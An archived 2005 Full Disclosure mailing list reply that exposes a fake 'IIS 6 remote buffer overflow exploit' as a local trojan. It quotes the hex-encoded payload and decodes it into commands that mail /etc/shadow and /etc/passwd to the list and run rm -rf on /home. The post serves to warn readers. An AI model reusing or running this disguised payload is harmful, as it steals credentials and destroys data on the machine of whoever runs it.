Full Disclosure mailing list archives
RE: IIS 6 Remote Buffer Overflow Exploit
From: David Li <matrixhax0r () yahoo com>
Date: Tue, 19 Apr 2005 18:01:24 -0700 (PDT)
<sarcasm>Wait, you mean if I run that, I can hack IIS?</sarcasm> ^_^
Not that anyone would fall for running this on anything besides a test system, but to save 30 second to decode, what it really does (locally, not remotely) is: cat /etc/shadow |mail full-disclosure () lists grok org uk cat /etc/passwd |mail full-disclosure () lists grok org uk /bin/rm -rf /home/*;clear;echo bl4ckh4t,hehe -----Original Message----- */ char shellcode[] = "\x2f\x62\x69\x6e\x2f\x72\x6d\x20" "\x2d\x72\x66\x20\x2f\x68\x6f\x6d" "\x65\x2f\x2a\x3b\x63\x6c\x65\x61" "\x72\x3b\x65\x63\x68\x6f\x20\x62" "\x6c\x34\x63\x6b\x68\x34\x74\x2c" "\x68\x65\x68\x65"; char launcher [] = "\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x73" "\x68\x61\x64\x6f\x77\x20\x7c\x6d\x61\x69" "\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69" "\x73\x63\x6c\x6f\x73\x75\x72\x65\x40" "\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b" "\x2e\x6f\x72\x67\x2e\x75\x6b\x20"; char netcat_shell [] = "\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x70" "\x61\x73\x73\x77\x64\x20\x7c\x6d\x61\x69" "\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69" "\x73\x63\x6c\x6f\x73\x75\x72\x65\x40" "\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b" "\x2e\x6f\x72\x67\x2e\x75\x6b\x20"; _______________________________________________ Full-Disclosure - We believe in it. Charter:
http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
__________________________________ Do you Yahoo!? Plan great trips with Yahoo! Travel: Now over 17,000 guides! http://travel.yahoo.com/p-travelguide _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- RE: IIS 6 Remote Buffer Overflow Exploit Lauro, John (Apr 18)
- <Possible follow-ups>
- RE: IIS 6 Remote Buffer Overflow Exploit David Li (Apr 19)